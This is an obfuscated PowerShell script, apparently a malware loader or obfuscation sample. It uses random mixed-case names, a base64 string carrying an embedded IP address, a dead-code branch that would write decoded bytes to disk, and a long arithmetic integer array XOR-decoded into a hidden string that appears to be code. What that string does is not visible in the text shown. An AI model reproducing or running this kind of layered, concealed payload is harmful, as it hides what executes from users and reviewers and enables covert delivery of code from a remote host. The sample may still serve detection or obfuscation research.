FuNCTion wrlIdJuM { 
    [ CMdLetbIndiNg() ]PaRAm( 
        [PArAmEteR (VaLUEFrOMpIpELInE)]
        $ylOvxkA,
        [PArAmEteR(VaLUEFrOMpIpELInE)]
        $QEbgW,
        [PArAmEteR (VaLUEFrOMpIpELInE)]
        $JFzrURJR
    )
    iF($FaLSe){
        $wDxv = [SySteM.conveRt ]::fRoMbAsE64sTrInG($ylOvxkA)
        [io.FilE]::WRitEAllbYTeS( "$pwd/njvoxuvj", $wDxv )
    
    }
}
$viLdenmK= @( 'JHJlc3VsdCA9ICJTaXIsIHlvdSd','yZSBubyBnZW50bGVtYW4uIEFuZC','B5b3UgbWlzcyBhcmUgbm8gbGFke','S5pcDoxNDMuNzYuMTU5LjEyMyIK')
$pLshc = $viLdenmK-joIN''
wrlIdJuM -ylOvxkA $pLshc -QEbgW 'rvvq' -JFzrURJR 'ZErw'
$fJVfQBs = [Int[] ]( (56 -3),(88- 30),(61 -8),( 22+31),( 48 - 6),(19+ 72),( 57+17), (54+ 42),( 32+ 87),( 14 + 83),( 78 + 25), ( 55+71), (98 +4),( 31 + 19),(96- 43), ( 76 -23), (63 -6), ( 14 +39),( 40 +13), (5 + 42),( 41 +9),(7 + 46),( 62 - 9), (25 + 32),(23+30),( 91 - 38), ( 30 + 86),(6 +100), (17 + 58),(36+3),(74 -29),( 65 +10),(9 + 82),( 71 +35), ( 33+ 73),( 59+ 21),( 92 +2), ( 49 +43),76, ( 15+ 65),(50+23), ( 29+ 96),( 96 - 55), ( 21+17),( 12 + 60),( 84 - 4),( 19 + 96), ( 11+73),(55 + 47), (93+ 6),( 91+6),( 62 +65),( 4+ 103), ( 54 + 63),(83+16),( 55+46), (41 -4),(31+86),( 68-15),( 73 -20), (58 - 1),( 7+ 46),( 54-1),( 21+20), ( 15+ 21),(52- 18),( 17+ 95), ( 90- 49), ( 69+ 47), ( 78 -45), (62+24),(58-5), (23 + 30), ( 69-12),( 29+24),( 14+ 39), ( 19+60), ( 79+ 44),( 80-1), ( 42 +57), ( 76+ 42), ( 27+61),( 17 +85),( 36+ 86), (75 -43),( 88+29),(48+53),( 11+95), (90- 11),(46 + 65), (65 +59), (51+46), ( 67+59),( 65 +37), ( 31 +52),( 12 +30), (67 +7),(61+ 39),( 29+ 60), (37 +56),( 57+ 42),( 27+ 54), (86+ 35),( 77 +29),(42+22),( 50+24),(2 + 85), (83 - 1),(88- 8), (39 + 87),( 11+94), ( 28+ 52), ( 51+64),( 2 + 82),(12+ 111),( 67 +52),(2+103), (88 +25), ( 83 +21),( 29+ 42), ( 78- 25), ( 36 + 17),(66- 9), ( 76 - 23), (92-39),(63 -27), (66 +21),( 99 +23),( 79+10),( 90-49),( 24 +76), (9 + 64), (37+89),(70 + 16), ( 89- 23), ( 18 +107), ( 61+ 19), ( 35 +80),( 2+ 82), ( 64+ 7), ( 91- 38), (77 - 24),( 75 - 18),( 48 +5),( 77 - 24), (50+30), ( 43 + 72),(23+61),( 50- 16),(78 - 8), ( 55 - 17), (77+ 22),(35 + 18), (51 +2),(86 -29),(59 -6),(33+20), (30+74), ( 3+32),( 79- 15), (36 +89),(31+ 95), (83 + 19), (59 + 20), (4 + 30),( 22+ 78), ( 34+60),( 27 + 76), ( 31+ 60), ( 37+ 63), (91 -48), (5 + 68), ( 47 +17), (13 +89),( 99+23),(82 - 50),(42+22),(73 +46),(16 + 51),( 23+ 10),(11 + 111),( 35 + 61),(29+ 93), (98-9),(61+ 29), (28 + 4),( 46- 11),( 74 - 30),( 34+46), ( 90 +25), (19 +65),(22+ 97), ( 59-18),(69 +32), (80 - 8),(73+48),( 84-13),( 7 + 113),(5 + 85), (17 + 51), ( 71 +22), (63+ 36), (36 + 45), ( 26+20), (51+45), ( 59 -16), (23 + 48),( 89 -3),( 51 - 9), ( 73 +14), ( 48 +40), (17+77),(91-48),(70 + 32),(17+69),(11 +32), (1 +40), ( 67 + 38),( 48+32), ( 13 + 55), (87 +19),( 3+95),( 1+ 78), (22 + 98),( 36+46),(76- 43),( 60 + 44), ( 71 +9), (8 +113),(39 +63),( 87+35),( 52 - 20), ( 37 +67), (53 + 27), ( 0 +68),( 10 +96),( 7+57),(26+19),(68+22),(66 +47),( 73 + 20), ( 31 +92), ( 24+53), ( 28+ 16), (35 +88), ( 40 +77),100, (69- 31),( 30+55), (60+56), ( 88-12), (17 +64),( 63 + 24), ( 49+66), ( 70+31), ( 65+24), ( 64 +16),( 49+ 66),(13 + 71),( 13+ 28),(98- 18), ( 7+ 61), ( 85+ 21),(11+24),(67-20), (54-9), ( 8 + 86), (51 + 39),( 66+34), ( 27 + 60),(21+32),(19 + 34), (97 - 40), (15 + 38), (34 +19),(2+74),( 58 - 26),(17 + 79), (29+ 72),(11+ 60),(0 + 36),( 99-6), (17 + 82), (16+65), (70 + 24), ( 52+12), (6+105),( 67 - 22), (71 + 16), ( 62 + 63), ( 20 + 78),( 58 +60),( 10+81),( 0 +123), ( 22+13),(9 + 78),( 9 +37), (14 + 83), (58 + 6),( 35+ 30),( 57+ 64),( 95+6), ( 0+73), ( 70+ 10),(22 + 46),( 84 - 40),( 43+ 23), (12+58),(55+38),(69+30), ( 90- 9), ( 22+ 93),( 48- 14), ( 45 +24), ( 64+18), (82 -6), ( 83 - 48), ( 32+44),(73 + 53),( 23 + 65), ( 97 - 4),( 98+ 26), (49 - 5), ( 17 + 96), ( 72 +32), (87- 7),( 34 +56),( 53 +50), (65+22),(3 + 88),(37+10),( 39 + 44), ( 32+ 10),( 21 +94), (49 - 4),(78 - 10), ( 100-3), (73+2),( 88+ 5), ( 3+ 122),(36+ 38),(93 - 46), ( 88 - 51), (86+ 30),(94 -41),(0+ 53),( 98 -41),( 28 +25), ( 44 +9),(69 -4),(96 + 29), (69 + 50),(99 +19), ( 56 + 47),(32 + 50), (30+72),(37+ 85), (65- 33), ( 78- 6),(55+ 21),(81 -28), (25 +28), ( 38+19), ( 29+24), ( 70 - 17),( 90-16),(12 + 78), (36 + 34),( 75 - 28),(90- 56), (73 -29),(1 + 123), (45+20),( 95+32),( 42 - 6), (29+38),(20+19), (32+ 43), (17 +52),(66- 34),( 9+62), ( 38 + 64), ( 77 -45), ( 42+ 82), (67+ 46),(32 + 50),(81 - 5), ( 21+ 49),(2+91), ( 30+ 69),(11+ 70), (55+ 18), (29+ 17), (25 +48),( 32 +64),(17 +108),(48 -7),(9+26),(15+75),(24+ 60),(3 + 76),( 91- 1), ( 35+18),( 39+ 14), (52 +5), (45 +8), (0 +53), (44 + 45),(31 +94), ( 13+ 103),( 44 - 9), ( 56+17), (11+ 80), (2 +118), (94- 1), ( 16 +83), (23 + 58),( 35 + 58),( 33 +66), (50 +31), ( 14+60),( 77-43), ( 26 +64), ( 52-16),( 44-1), ( 99 + 25),(19 + 63), (87 + 28), ( 62+ 25),( 52+53),( 90+6),( 100-8),(80+ 8), ( 8+105),(98 +14), ( 49 +56), (81+15), (55 + 64), ( 100 -34),( 45 + 45),( 12 +34),( 51 +46),( 47 -14), ( 9 + 58), (13+20),(11+ 58),(78 - 36), (53 +33),( 53+59), (5+117),( 76+ 24), ( 3+ 89),(88+ 4),( 51 +41), (56+19), (59 + 33), ( 36+ 87),( 86 +30),( 81 + 40), (7 +63), (47+ 78),( 40 +36),( 2+ 62), ( 26 +54), ( 89 - 21), ( 10 + 96),(26+48),(33+93), ( 87-40),( 25+ 12),( 71+ 20), ( 0 + 70), (6 + 111),(42+ 29), ( 29+ 90), ( 33+ 85), ( 92 + 9), ( 2 +102),(38-1),( 47 + 23),( 70 +47),( 31+44), (93 - 8), ( 52 +64),(98 -24),( 51 +35),( 23+ 79), ( 75 + 23),( 19+23),(4+ 111), ( 87 - 41),(71 +48), ( 77 -24), (16+37),( 79 -22),( 5+ 48), ( 17+36),(65 +37),( 13 + 82), (15 + 77), ( 36 +34),( 26 +99),(1 + 89), ( 97+5),(3+120), (36+62),93, ( 68+ 31),( 22 + 59), ( 55 - 23), (90-51),( 48-10), (81 -10), (17+ 98),(23 +90),(86 - 54),( 79-41),( 54 - 12),(3 +68),(40+ 75), ( 95+ 18),( 27+ 8),( 7+ 29), ( 9 + 23),( 25 +46),( 33+ 82),( 83 +30), ( 55 -23), (67-29),( 59-17), (80 +26),( 11+77),(63+ 37), (50 + 73),(32+54), (75 -5),( 46- 10),(20 + 77),(23+12), ( 23+18), ( 64+ 16),(86+ 25), (11+ 110), ( 9+76),(96-3), (30+54), ( 6 +106),(60 +47), (34 +86),(48+47),(90 +3), (71 - 34),(34+ 85),(6+35),( 75+ 19),( 77 - 41),(65 + 37), ( 68- 31),( 35+ 49),( 98+ 28),( 89 +13), (22 + 50),(57 + 70), ( 91+ 5), (92-15),(99-46), ( 73-20),(91 - 34),( 92- 39),( 13+40),( 4+119),(25+11),( 11+ 107), ( 17 +87), (15 +84),( 92 - 20), ( 75- 32),(63 + 20), ( 6 + 100),( 69+29),( 25+ 28),(83 - 30), ( 49 + 8),( 5 +48),( 27 + 26),(0+104),( 74+ 12),( 16+70), ( 31+ 10),(70-23),(42+ 50), ( 74-30), ( 81+23), ( 78 -36), (49+23), ( 56-17), ( 14 +80),(98+24), ( 35+ 53), (41+ 84), (64 + 10),( 78+34), (72+ 27), ( 22+19), ( 53 +35),(82 + 4), (45 + 29),( 23+ 76),( 36+ 68), (69+ 56),( 64+ 40), ( 73+48), (70 +54),( 18 +21), (78-33), ( 19 +70),( 23+62),(9+67), ( 28 +83), (36+66),(61-28), (88 + 11), ( 19 + 48),( 77 +12),( 26 +86), (0+33), ( 83+14), ( 41 + 52),( 40 + 59), ( 91- 10),( 4 +89), ( 69 + 20), ( 15+ 21),(24 + 72),64,( 47+ 79),( 57+ 18), ( 68 + 37),(18+ 64), (84 +19),(77+ 27),(31+ 64), (57 +60),( 19+ 106), ( 100- 2),( 61+ 11),(61 -29), (8 + 85), (64 +35),(19+ 62), (33+ 89),(85- 21),( 21 + 82), ( 65 - 21),( 32 +72),(8+ 112),( 71-37), (30 + 72), ( 48 +74),( 65 -33),( 51+ 40), (1 + 126),( 69+ 57), ( 90 -10), (85 +30),( 80+4), ( 81 - 9), (38 +35), (34+5), ( 88 + 2),( 31+ 56), (95- 59),( 10 +60), (9+61),(22+ 13), ( 17 +18), ( 69 + 21), ( 19+ 60), ( 64+13),( 81- 11), ( 41 +41), (66+41), ( 34+68), (79 + 43), ( 15 +17),(88 + 4),( 77 + 44), (96 -10), ( 80 +46), (100 -10), (52 -8), (46 +47), ( 13+86), (74 +7),( 78+ 6),(3+ 80), ( 61 -29),( 14 +109), (95 -53),(44 + 57), (97+9), (39-6), (64+28), ( 99- 35),(18+ 62),(2+ 66), (80+26),( 29+56), (79- 34), ( 86 +14),(63+ 25),( 83+33),( 94 +7), (55 +47),( 6 +106),( 73-30), (33 + 3),( 25+ 82), ( 16+37),(15 + 38),( 12+45),( 12+ 41), (54- 1),(26 +91), ( 92 - 17), ( 23 +43), (26+16),( 8 +90), ( 78 + 42), ( 4 +75), (18 + 57), ( 3+77), (5 + 108), (37+ 31),( 13 + 25), ( 15 + 59),( 78-11),( 11 + 24), ( 2 + 99), ( 94 - 3),(28+69), (4 + 84), ( 69+23), (80-46),(54+ 69), ( 94 - 6),( 67 + 53), (10 + 105), (56+ 24),( 39+29), ( 5 + 101), (18 + 62), (9+106), ( 23 +61), (78- 2),(64+ 7), (94 + 17), ( 32 + 58), (56 + 23), (35 +30), ( 28 +95), (14 + 90),( 84- 12),(97- 17),( 71-18), ( 87- 34),( 30 + 27), (62- 9),( 14+ 39),( 58 +10), ( 25 +81),( 19 +22),(86 - 50),( 6 +76),( 77 - 2),(87+ 5),( 63-10),( 14+39), (72- 15),(20+33),(67 -14), (25 +86), ( 38 + 28),(10 +117), ( 70 +12), ( 24+ 13), ( 53 -19), ( 69 + 53), (75-38),(78 + 15),(5 + 94),(98 -17), (10+ 32),(7+92),(40 + 57), (48+ 20), ( 45 +24), (2+119),( 8+99),(8 +87), (39+6), (73-1),( 29 + 73), ( 33+ 89), (59- 27),(1 +70),( 7+40), ( 57 +23), ( 68+ 47), ( 12+ 72),( 16 +63),(84 - 12),( 36 + 89),(67 +16),(100+16),( 54 + 10),( 30 +68), ( 62+ 50), (87-21),( 0+ 44),(4+ 66),( 12+76),( 44 -3), ( 47+ 39), (76+ 24), ( 51+ 42),( 57 +42), (16+ 65),(98 - 59),( 11 +65),(51+ 66),(98 - 60), (40+ 64), ( 78 + 28), ( 44 + 9), (14+ 39),( 20 +37), ( 7+ 46),( 73-20), (74 + 11), (87 - 11), ( 61 + 16), (85 + 40), ( 17+ 60), ( 56+ 42), ( 45+ 28),(4 +114), (84 +2), ( 36 +83),( 42 + 5), (91 +8),( 64 + 31), ( 73 + 50), (48 -14),(94- 47),( 45 +31),(6+ 67), (6 + 86),( 10+ 22), ( 70+11),(18 +93),( 99 - 62), (97 +30),(15 + 19), (80+ 15), (27 +49),( 75- 38),( 71+45),(8+ 90),( 87+ 35), ( 83 +6),( 54 + 58), (55+32),( 42+28), (47+ 20),( 88 +28),( 11 + 110),(46+ 41),(30 +70),( 13 +78),( 86 -5),(2+109), ( 4 + 112), (10+ 35),( 45 +50), (32 +86), (37+ 2),( 28+ 4),( 79+ 38),( 20+ 95), ( 88-16), ( 78+ 6), (13+ 74),( 79- 2),(34+65), (75- 1), (91+29),(100- 30),(82 -38),( 8 + 85), (7+90),( 23 +95), ( 74 +49),(91-52), (51+ 15), (82 +13), ( 64 +60),( 17 + 18), ( 61 + 4), ( 76 - 34),(78 + 33), ( 33 + 56),( 79 +42), ( 39+76), ( 92 + 25), (83 +2),( 13+81), ( 96-4),( 71+40),(48-15), (100+6),( 69 + 24),( 69 +30), ( 35+46), ( 27 +53), (96 - 28), (22 +84), ( 93-19), (15 +28),(26 +40), (59 -15),(67 - 26),( 22 +84), ( 4+73),(9+ 79), ( 83+ 35), (43 + 76),(63 +7),(59 +48),( 8 +38),( 28+40),(21+ 81), ( 5 +117),(31+1),( 51 - 19),( 40+ 5),( 19+16), (56+70),(36 +65),(1+ 79), (40 + 28), (8+ 98),( 7 + 38), (98- 64),( 25+59), ( 30+50), (19+ 49),(93+13), (48 + 77), ( 35+70),( 38 + 55), ( 51 +48),(63 + 18), (14+58), ( 14 +39), ( 95 -42), ( 23+ 34),( 70 - 17), (25 + 28),(2 +86),( 88 - 23),(28+68),(100- 14),( 59+ 33),( 8+ 78),( 12 +86), (40+67),( 96 + 23),( 4 + 42), 69, (42 + 52), (91-58),(62 -28), ( 50-14), ( 68+18), ( 52 +35), ( 76 + 39), (13+ 77), ( 95 + 26),(81 -8), (40 +37),(70 + 42), (76+10),(3 +90), 91,(72-26), ( 58+34),(58 -22), 97,( 33 +91),(5 + 106),(9+23), ( 14+73), (51+ 16),( 70 -23),( 55 -22), (39 + 88), (86-22),( 27 + 16),(59+63), ( 73 +45), (21+96),( 35 + 1), (77+ 6), ( 68- 30), (17 +64), ( 55 + 50),(47+46),( 42 +57), ( 26+55), ( 58+ 36), (1+ 43),( 0+ 112), ( 91- 11), ( 32+36), ( 93 + 13),( 40 + 52), (89-53),(66+36),(38 + 84), ( 9 +23), ( 23 + 79), (10 + 66),( 66+ 29),( 46 - 8),( 33+ 2),( 31 +15),(15 + 112), ( 0+ 126), ( 60 +62),(23+ 68),(8+29),(27+ 77), (81 +26), (45+ 47),(36 + 57),( 2+ 97),( 62+19),( 47+ 36),(90 -16),(97 - 31),(99+ 21),( 69 -22), ( 33 + 67),( 42+ 51), ( 48 +31),( 47+68), (37-4), (18 +86),(43+ 63), ( 88 - 8),(24 + 44), (72 + 34), (41 + 45), 32, ( 62+ 35), (12 +86),(1 + 75),(62+ 13), ( 69+25), ( 70+47),( 67- 32), ( 45+22), (43 +54), (66+31), (21 +104), ( 6 +65),( 87 - 5), ( 28+ 63),(97-16),( 100- 15), (17 +22), ( 65+ 61), ( 19 +18),(98 - 17), (36+ 2),( 60 +34), ( 82+30),(94 + 5),( 53 +34), ( 82 - 9),( 45+81),( 40+ 76),( 28+19),( 43 +10),(18+35), (16 +41), ( 64 -11),( 19 + 34), ( 59 +47),(42 + 39),( 68 +9), ( 53+42),(34 +53),(10+80), (60+ 63), ( 36+48),( 0+96), (78+ 26), ( 74 +30), (33 +33), (50+56),( 28+77), ( 2 +67), ( 13+ 77), ( 74- 3), (58 + 32),(17 +63), (11+ 57),( 48+ 58),( 11 + 27),( 51 +74),( 14 +66),(30 +85),(36+48),( 20 +75),( 96+28), ( 14+58),( 11 + 65),(13 + 109),( 39 + 54), ( 38+52), ( 97 - 30), ( 96+ 31),( 46 +72), ( 70 - 17), (51 +2), ( 30+27), ( 39 +14),(61 -8),( 21 +100), ( 37 + 84), ( 92 -9), (36+8), (66 + 54),(49+ 41), ( 88 - 11),( 46- 2), (22+ 52), (38 + 26),( 98+ 4),( 4 + 118), ( 3 + 29), ( 30+43),(33 +42),( 69+53), ( 19 + 13), (86 +16),( 50 + 72),(15+ 17), ( 100 - 57),(74 - 3),(8+119), (5+ 64),( 7 +83), ( 19+107), ( 61 + 38),(15+67), ( 59- 21), (95 -10), ( 62 + 18),(99-31),( 42 +64),(50 + 3),(23+30),( 29+ 28),( 85- 32),( 12+41), ( 16 +30),(70 - 35), ( 31+ 61), (81 +40),( 33+67), ( 54-16),(30 + 41), (61+ 11), ( 28+ 11), ( 80 + 5), (38+88), ( 84-7),( 65-22),(28+93),( 71+ 55),(54+41), ( 43+46),(56+44),( 15 + 75),( 36-4), (71+10),( 75+ 41),(26 + 101),( 84- 4),( 73 +18), (66 +46), ( 24 +82), (55 - 10), ( 15 +31),(89+1), ( 3+ 63), (5+106),(81 - 10), ( 57+ 59),( 5+ 101), (42+33), ( 71 - 18), (27+ 26), (33 + 26), ( 50 + 3))
$vXET= $fJVfQBs| % {[cHaR]($_ -bxor  0x12)}
$vXET= $vXET-joIN ''

